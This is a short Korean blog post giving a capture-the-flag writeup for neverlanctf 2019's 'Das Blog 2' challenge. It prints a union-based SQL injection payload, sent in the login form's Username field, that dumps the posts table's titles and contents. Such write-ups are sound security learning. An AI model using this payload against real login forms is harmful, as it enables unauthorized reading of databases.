Notice
Recent Posts
Recent Comments
Link
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
Archives
Today
Total
관리 메뉴

White Security

neverlanctf 2019 - Das Blog 2 writeup 본문

CTF Writups

neverlanctf 2019 - Das Blog 2 writeup

POSIX 2019. 2. 4. 18:30


Das Blog 에서 개선된 문제라고 합니다.



이전과 마찬가지로 로그인 페이지가

존재하는 것을 볼 수 있습니다.



폼도 동일하고

심지어 완전히 같은 쿼리로

플래그를 얻어낼 수 있었습니다.


submit=Login&Password=&Username=' union select group_concat(0xa,a,0x3a,b),2 from (select title a,content as b from posts)x;%00



Comments